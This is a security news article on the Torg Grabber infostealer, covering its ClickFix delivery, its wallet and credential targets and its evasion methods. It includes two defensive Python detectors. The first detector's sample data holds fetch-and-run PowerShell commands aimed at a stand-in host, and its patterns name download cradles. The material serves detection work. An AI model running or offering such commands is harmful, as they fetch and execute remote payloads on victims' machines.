New Torg Grabber Infostealer Malware Targets 728 Cryptocurrency Wallets
By Bill Toulas | March 25, 2026
A newly identified information-stealing malware, dubbed Torg Grabber, targets data held by 850 browser extensions, 728 of them cryptocurrency wallet extensions. The stealer harvests credentials, session cookies and wallet data from infected Windows hosts, putting both digital assets and personal information at risk.
How Torg Grabber Gains Access
Torg Grabber is delivered through ClickFix, a social-engineering technique in which a lure page (typically a fake CAPTCHA or error prompt) silently writes a malicious PowerShell command to the victim's clipboard and instructs them to paste it into the Windows Run dialog and press Enter. Because the victim launches the command themselves, the infection needs no exploit, and the resulting process looks like ordinary user activity, which is why it often passes without immediate suspicion.
According to researchers at Gen Digital, the malware is under active development: between December 2025 and February 2026 alone they catalogued 334 unique Torg Grabber samples, and new command-and-control (C2) servers are registered every week, indicating an expanding attacker infrastructure.
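The ClickFix chain described above leaves a characteristic trace on the host: explorer.exe (the Run dialog) spawning an interpreter with hidden-window, policy-bypass or download-cradle arguments, and the same command recorded in the user's RunMRU registry key. As an added example, not code from Gen Digital's report or from this article, the following Python scores constructed Sysmon-style process-creation records and RunMRU values for that pattern. The sample events, the hostname lure.example and the scoring weights are invented for illustration.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    image: str
    parent_image: str
    command_line: str


# Interpreters a ClickFix lure typically tells the victim to paste into Win+R.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits with weights; all patterns are matched case-insensitively.
TRAITS = [
    (r"-(w|windowstyle)\s+h(idden)?\b", 2, "hidden window"),
    (r"-(ep|executionpolicy)\s+bypass\b", 2, "execution policy bypass"),
    (r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 3, "encoded command"),
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", 3, "download cradle"),
    (r"\b(iex|invoke-expression)\b", 3, "in-memory execution"),
    (r"#.*(not a robot|verification|captcha)", 3, "lure comment string"),
]
THRESHOLD = 6  # alert cut-off chosen for this example, not a figure from the report


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path, with surrounding quotes removed."""
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Score one process-creation event; higher means more ClickFix-like."""
    reasons: List[str] = []
    if basename(ev.image) not in INTERPRETERS:
        return 0, reasons
    score = 0
    # Commands typed into the Run dialog (Win+R) are children of explorer.exe.
    if basename(ev.parent_image) == "explorer.exe":
        score += 2
        reasons.append("spawned by explorer.exe (Run dialog)")
    for pattern, weight, label in TRAITS:
        if re.search(pattern, ev.command_line, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return score, reasons


def is_clickfix(ev: ProcessEvent) -> bool:
    return score_event(ev)[0] >= THRESHOLD


def suspicious_runmru(values: Dict[str, str]) -> List[str]:
    r"""Re-score commands recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
    Each value holds '<command>\1'; the MRUList value only orders the entries."""
    hits: List[str] = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        tokens = cmd.split()
        if not tokens:
            continue
        exe = basename(tokens[0])
        if not exe.endswith(".exe"):
            exe += ".exe"  # RunMRU entries usually omit the extension
        ev = ProcessEvent(image=exe, parent_image="explorer.exe", command_line=cmd)
        if is_clickfix(ev):
            hits.append(cmd)
    return hits


SAMPLE_EVENTS = [  # constructed records, not from a real incident
    ProcessEvent(  # ClickFix: hidden PowerShell, download cradle, lure's comment string
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line='powershell.exe -w hidden -ep bypass -c "iex (irm https://lure.example/verify)"'
                     ' # "I am not a robot - reCAPTCHA Verification ID: 7431"',
    ),
    ProcessEvent(  # user opened an interactive PowerShell window
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    ),
    ProcessEvent(  # scheduled task running an admin script: the bypass flag alone is not enough
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\System32\svchost.exe",
        command_line=r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    ),
]

SAMPLE_RUNMRU = {  # constructed registry values
    "a": 'powershell -w hidden -c "irm https://lure.example/a | iex"\\1',
    "b": "notepad\\1",
    "c": "calc\\1",
    "MRUList": "acb",
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_clickfix(ev), score_event(ev))
    print(suspicious_runmru(SAMPLE_RUNMRU))
```

The weights are additive on purpose: an execution-policy bypass from a scheduled task scores low on its own, while the same flag combined with a hidden window, a download cradle and an explorer.exe parent crosses the threshold. RunMRU is worth checking in incident response because it survives after the PowerShell process has exited and shows exactly what the victim pasted.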
Extensive Data Theft Capabilities
Torg Grabber's primary targets are browser extensions across 25 Chromium-based browsers and 8 Firefox variants. It also extracts browser-stored passwords, cookies and autofill data. Of particular concern is its focus on cryptocurrency wallets, which covers nearly every popular wallet extension:
- MetaMask
- Phantom
- Trust Wallet
- Coinbase Wallet
- Binance Chain Wallet
- Exodus
- TronLink
- Ronin Wallet
- OKX Wallet
- Keplr
- Rabby
- Sui Wallet
- Solflare
Researchers note that beyond the well-known names, the malware targets an extensive array of less popular, niche wallets, amplifying its potential impact.
In addition to wallets, Torg Grabber steals information from 103 password manager and two-factor authentication extensions such as:
- LastPass
- 1Password
- Bitwarden
- KeePass
- NordPass
- Dashlane
- ProtonPass
- Enpass
- Psono
- Pleasant Password Server
- heylogin
- 2FAAuth
- Google Authenticator (GAuth)
- TOTP Authenticator
- Akamai MFA
The malware’s reach also extends to popular communication and utility apps including Discord, Telegram, Steam, various VPNs, FTP clients, email software, and desktop cryptocurrency wallet applications.
Advanced Technical Features and Rapid Evolution
Gen Digital’s analysis highlights several sophisticated evasion and data exfiltration techniques employed by Torg Grabber:
- Exfiltration initially went over Telegram and later moved to a custom encrypted TCP channel.
- By late December 2025 both had been replaced by HTTPS connections fronted by Cloudflare, which blends the transfers into ordinary web traffic and hides the true C2 origin.
- The malware uses multi-layered obfuscation and anti-analysis checks, and runs its payload entirely in memory via direct syscalls and reflective loading, sidestepping user-mode API hooks and on-disk scanning.
- On December 22, 2025, Torg Grabber gained a bypass for App-Bound Encryption (ABE), the Chrome mechanism that releases the cookie and credential key only to a caller validated as the browser itself, undermining cookie protection in Chrome and other Chromium browsers.
- A companion tool known as Underground, a DLL injector, obtains Chrome's master encryption key through the browser's COM elevation service (the privileged component that performs that validation), a technique also observed in other malware such as VoidStealer.
Further capabilities include host profiling, hardware fingerprinting, enumerating installed software (including 24 antivirus products), capturing desktop screenshots, and stealing files from the Desktop and Documents folders. The malware can also execute encrypted shellcode payloads delivered from its C2 servers.
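Two of the behaviours above are visible to host telemetry regardless of how the C2 channel is encrypted: a foreign process injecting into a Chromium browser to reach the ABE key, and, for the early variant, a non-browser process resolving Telegram domains. As an added example, not code from Gen Digital or this article, the following Python checks constructed Sysmon Event 8 (CreateRemoteThread), Event 10 (ProcessAccess) and Event 22 (DNS query) records for those two signals. It assumes the injector targets a Chrome process so that the elevation-service call originates from a validated browser image, which the report summary does not spell out; the trusted-process list, the sample paths and the access masks are illustrative and must be tuned to the fleet.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Process access rights (winnt.h) an injector needs: create a thread, reserve or
# commit memory, and write the DLL path or shellcode into the target.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
# Images allowed to open browser processes with thread/write rights. Assumption for
# this example: replace with the EDR/AV actually deployed.
TRUSTED_SOURCES = CHROMIUM_BROWSERS | {"csrss.exe", "lsass.exe", "msmpeng.exe"}
# Images expected to resolve Telegram domains on a workstation.
TELEGRAM_OK = CHROMIUM_BROWSERS | {"firefox.exe", "telegram.exe"}


@dataclass
class SysmonEvent:
    event_id: int  # 8 = CreateRemoteThread, 10 = ProcessAccess, 22 = DNSEvent
    fields: Dict[str, str]


def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def check_event(ev: SysmonEvent) -> Optional[str]:
    """Return an alert string for one event, or None if it is not interesting."""
    f = ev.fields
    if ev.event_id in (8, 10):
        src, dst = basename(f["SourceImage"]), basename(f["TargetImage"])
        if dst not in CHROMIUM_BROWSERS or src in TRUSTED_SOURCES:
            return None
        if ev.event_id == 8:
            return f"{src} created a remote thread in {dst} ({f.get('StartFunction', '?')})"
        granted = int(f["GrantedAccess"], 16)  # Sysmon logs it as a hex string
        if (granted & INJECT_MASK) == INJECT_MASK:
            return f"{src} opened {dst} with thread/write rights {hex(granted)}"
    elif ev.event_id == 22:
        img, q = basename(f["Image"]), f["QueryName"].lower()
        if q.endswith("telegram.org") and img not in TELEGRAM_OK:
            return f"{img} resolved {q} (Telegram-based exfil channel)"
    return None


def scan(events: List[SysmonEvent]) -> List[Tuple[int, str]]:
    """Index and alert text for every event that trips a check."""
    out: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        alert = check_event(ev)
        if alert:
            out.append((i, alert))
    return out


CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [  # constructed records, not taken from the report
    SysmonEvent(8, {"SourceImage": r"C:\Users\victim\AppData\Local\Temp\injector.exe",
                    "TargetImage": CHROME, "StartFunction": "LoadLibraryW"}),
    SysmonEvent(10, {"SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
                     "TargetImage": CHROME, "GrantedAccess": "0x1FFFFF"}),  # AV: trusted
    SysmonEvent(10, {"SourceImage": r"C:\Users\victim\Downloads\monitor.exe",
                     "TargetImage": CHROME, "GrantedAccess": "0x1410"}),  # read-only access
    SysmonEvent(22, {"Image": r"C:\Users\victim\AppData\Local\Temp\svc.exe",
                     "QueryName": "api.telegram.org"}),
    SysmonEvent(22, {"Image": CHROME, "QueryName": "web.telegram.org"}),  # browser: expected
    SysmonEvent(10, {"SourceImage": r"C:\Users\victim\Downloads\monitor.exe",
                     "TargetImage": CHROME, "GrantedAccess": "0x1F0FFF"}),  # full access
]

if __name__ == "__main__":
    for idx, alert in scan(SAMPLE_EVENTS):
        print(idx, alert)
```

The Telegram check only catches the earliest variant; once exfiltration moved to Cloudflare-fronted HTTPS, domain reputation stops helping and the injection signal is the one that survives. The access-mask test deliberately ignores read-only handles so that monitoring tools that merely query the browser process do not generate noise.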
Ongoing Threat and Expanding Actor Base
Torg Grabber is a rapidly evolving threat, with its operator base growing steadily. By the time of Gen Digital’s report, 40 unique operator tags had been documented, and new C2 domains continue to emerge weekly.
Defenders should watch for the ClickFix execution chain (explorer.exe spawning PowerShell with hidden-window, execution-policy-bypass or download-cradle arguments, and the same commands recorded in the user's Run-dialog history), for non-browser processes injecting into or opening Chromium browser processes with write access, and for unexpected outbound traffic from processes that have no reason to reach the internet. Users should keep browsers and security software up to date and should never paste a command from a web page or message into the Run dialog or a terminal, whatever the page claims it will fix.
For detailed insights into Torg Grabber's behavior and mitigation strategies, see the full technical report by Gen Digital.
About the Author:
Bill Toulas is a seasoned tech writer and information security news reporter with over ten years of experience covering malware, data breaches, and cybersecurity developments.